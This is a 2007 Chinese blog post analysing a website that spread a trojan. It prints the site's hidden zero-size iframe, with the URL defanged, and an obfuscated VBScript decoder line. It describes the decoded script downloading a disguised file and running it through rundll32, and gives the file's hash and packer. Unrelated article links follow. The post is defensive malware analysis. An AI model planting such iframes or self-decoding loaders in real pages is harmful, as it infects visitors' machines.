一个传播Trojan.Win32.Agent.aac的网站

最新推荐文章于 2022-02-25 21:57:21 发布
最新推荐文章于 2022-02-25 21:57:21 发布
阅读量1.4k 收藏
点赞数
分类专栏: 系统安全 文章标签: vbscript 解密 iframe c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/purpleendurer/article/details/1524215
版权

endurer 原创

2007-03-08 第1

网站首页包含代码:
/---
<iframe src="hxxp://2007.ads***3721.com/0*2**0***1.htm" width="0" height="0"></iframe>
---/

hxxp://2007.ads***3721.com/0*2**0***1.htm

Kaspersky 报为 Trojan-Downloader.VBS.Small.dv,其中包含VBScript程序,功能是解密变量a的值并执行。

相关代码为:
/---
D="EXECUTE """"":C="&CHR(&H":N=")":DO WHILE LEN(a)>1:D=D&C&LEFT(a,2)&"-2"&N:b=a:a=MID(b,3):LOOP:execute D
---/

重复5次解密过程,得到一段VBScript程序,功能是利用 Microsoft.XMLHTTP 和
scrīpting.FileSystemObject 下载文件 boy.jpg,保存为 %temp%/h1.bmp,并利用Shell.Application 对象Q 的 ShellExecute 方法 运行:"rundll32.exe",%temp%/h1.bmp,"","open",0


文件说明符 : D:/test/boy.jpg
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-8 12:43:41
修改时间 : 2007-3-8 12:44:34
访问时间 : 2007-3-8 12:45:19
大小 : 42856 字节 41.872 KB
MD5 : 845989a7edc5527a88e0cb917525171e

采用 nSPack 1.3 -> North Star/Liu Xing Ping 加壳。
Kaspersky 报为 Trojan.Win32.Agent.aac

 

后记:


昨天发现一个调用 cmd.exe 来运行的:

发现一个传播威金/Worm.Win32.Viking.if的网站,用的技术很新颖
http://endurer.bokee.com/6147701.html
http://blog.sina.com/u/49926d91010007ur
http://blog.i0778.com/?1314/action_viewspace_itemid_2643.html

 

今天又遇到一个调用 rundll32.exe 来运行的。 

紫郢剑侠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[转]做自己的m3u8点播系统使用HTTP Live Streaming(HLS技术)
heiyeluren的blog(黑夜路人的开源世界)
08-25 1万+
做自己的m3u8点播系统使用HTTP Live Streaming(HLS技术)
iphone利用AudioQueue播放音频文件(mp3,aac,caf,wav等)
weixin_30312557的博客
11-26 139
最近在做iphone上的流媒体播放,需要用到播放音频流,参考了好多博客、网站,最终算是把这个比较难弄的问题解决了。这篇文章是播放音频文件的,我会专门用一篇文章来介绍如何用AudioQueue来播放raw pcm data,相信这是大多数ios开发同胞需要的吧。在此分享出来,希望能帮助到真正需要的人,毕竟一个人的力量是有限的,还是要共同学习、共同进步。1.playAudio.h声明了一个Object...
MongoDB 快速下载地址
gedasong_aac的博客
11-28 2601
http://dl.mongodb.org/dl/win32/x86_64
AAC(Android Architecture Components)
热门推荐
点滴积累
02-27 1万+
1.初识 最近项目内有用到这个,故特地来学学,并且记录下来。有错误请直接指出,感谢。 AAC是啥 它是在Google 2017 I/O大会 提出来的一个概念,即Android Architecture Components(简称AAC),它是一套新的架构组件,使App的架构更加健壮。 图示 它的构成(本图来自:http://www.cnblogs.com/zqlxtt/p/688...
关于桌面程序被安全软件误判为HEUR:Trojan.Win32.Generic的解决方案
10年职场两茫茫,35岁凄凉奈若何
06-29 5089
关于桌面程序被安全软件误判为HEUR:Trojan.Win32.Generic的解决方案
2020年trojan最新windows64客户端trojan-1.15.1-win.zip
04-14
2020年trojan最新windows64客户端
Trojan专杀工具,用着真不错.
03-19
Trojan专杀工具,用着真不错;我在网上找了好长时间才长到的,愿意与大家一块来分享.另外,本人是教育行业的,分享一个好的英语资料下载站:http://www.51tjw.com
Trojan-Downloader.Win32.Generic.a...
06-08
【病毒名称】:Trojan-Downloader.Win32.Generic.a 【病毒类型】:下载者 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 该病毒为下载者木马类,病毒运行后调用API获取系统文件夹...
trojan-1.16.0-win.zip
04-01
trojan
js.scob.trojan.nasl
最新发布
11-08
js.scob.trojan
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 8718
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 3122
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
Android开发(1) | Fragment 的应用——新闻应用
Jormungand_V的博客
02-21 3587
文章目录 news_item.xml: <TextView xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/news_title" android:layout_width="match_parent" android:layout_height="wrap_content" android:lines="1" android:ellipsize="
系统学习 TypeScript(四)——变量声明的初步学习
编程三昧
02-25 1486
认识了 TypeScript 中的基础类型,接下来当然是变量声明的相关学习了,我在这里记录一下我学习过程中的一些总结。
清除浮动的五种方法
weixin_52212950的博客
02-22 2169
为什么要清除浮动?因为往往浮动后的子元素因为脱离了标准流,不能自动撑起父元素的高度,所以会对后续布局产生影响,对此清除浮动不如理解为清除浮动产生的影响更为合理。 例如:我们设置了两个盒子如图所示,粉色为父盒子,只有宽度没有高度,蓝色盒子有宽有高,粉色盒子的高由蓝盒子的高度撑开。 但是给蓝色的子盒子设置了左浮动后,脱离了标准流,无法再撑开粉盒子,可以看到粉盒子高度变成了0; 清除浮动有五种方法: 直接设置父元素的高度 额外标签法 单伪元素法 双伪元素法 ove.
HTML实现学习网站首页
做技术,坚持才是最重要的,一时的热情只是暂时的进步
02-20 3894
项目访问 reset.css /* http://meyerweb.com/eric/tools/css/reset/ v2.0 | 20110126 License: none (public domain) */ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del
C语言经典小游戏之----推箱子
嵌入式技术开发
02-25 4565
在进行推箱子的实验中,可以使用对应的API函数来改变对应箱子的颜色,也需要根据,人在移动的过程中,可以通过方向键,并改变对应的颜色,从而实现控制人物的目的。 代码实现如下: #include<stdio.h> #include<stdlib.h> #include<string.h> #include<windows.h> #include<conio.h> int x = 0, y = 0; //存储当前使用的...
关于Dubbo的mock=true降级无法调用降级类ServiceMock的解决方案
weixin_45754452的博客
02-25 1274
问题 消费者使用mock=“true”,想调用TestServiceMock进行服务降级无法调用 原因 我的项目结构如下,首先要知道服务降级代码应该是谁执行的,服务降级是服务消费者也就是controller包处对应的服务执行的,因为我只是测试dubbo怎么使用,所以并没有分多模块,但完全可以把一个包理解为一个模块,再看下面配置文件 为什么可以把一个包当成一个模块呢,因为我把配置文件的scan改成controller包然后启动一个服务器,即消费者,如果把scan改成service则可以启动服务提供者服务器
Vue---Vue基础
前端与计算机相关知识的分享,博主的qq523235674
02-25 1339
一.Vue概述 二.Vue的基本使用 2.1Vue.js之hello world 基本实例 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Document</title> </.
Trojan-Downloader.Win32.Agent.bbb 木马手动查杀
06-09
首先,关闭所有正在运行的程序,然后按照以下步骤手动查杀Trojan-Downloader.Win32.Agent.bbb木马: 1. 打开任务管理器,结束所有Trojan-Downloader.Win32.Agent.bbb木马相关进程。 2. 删除Trojan-Downloader.Win...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值